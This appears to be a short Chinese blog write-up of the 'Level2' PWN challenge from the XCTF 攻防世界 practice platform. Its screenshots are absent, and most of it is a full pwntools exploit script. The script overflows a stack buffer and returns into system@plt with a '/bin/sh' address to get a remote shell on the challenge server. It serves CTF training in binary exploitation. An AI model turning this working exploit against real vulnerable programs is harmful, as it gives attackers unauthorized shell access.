当前位置:网站首页>PWN攻防世界Level2

PWN攻防世界Level2

2022-06-29 02:31:00 Day-3

在这里插入图片描述

首先,标准流程走一下。
在这里插入图片描述
运行一下。
在这里插入图片描述
放入IDA中。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

编写exp:

from pwn import *

context(os='Linux',arch="x86",log_level="debug")
content = 0 

elf = ELF("Level2")
system_plt_addr = elf.plt["system"]
bin_sh_addr = next(elf.search(b"/bin/sh"))

def main():
	if content == 1:
		day3 = process("Level2")
	else:
		day3 =remote("111.200.241.244",56811)
		
	payload = b'a' * (0x88 + 4) + p32(system_plt_addr)
	payload = payload + b'aaaa' + p32(bin_sh_addr)
	
	day3.sendlineafter("Input:\n",payload)
	
	day3.interactive()

main()

在这里插入图片描述
在这里插入图片描述
获得Flag。

原网站

版权声明
本文为[Day-3]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_61823031/article/details/125508672

边栏推荐

猜你喜欢

随机推荐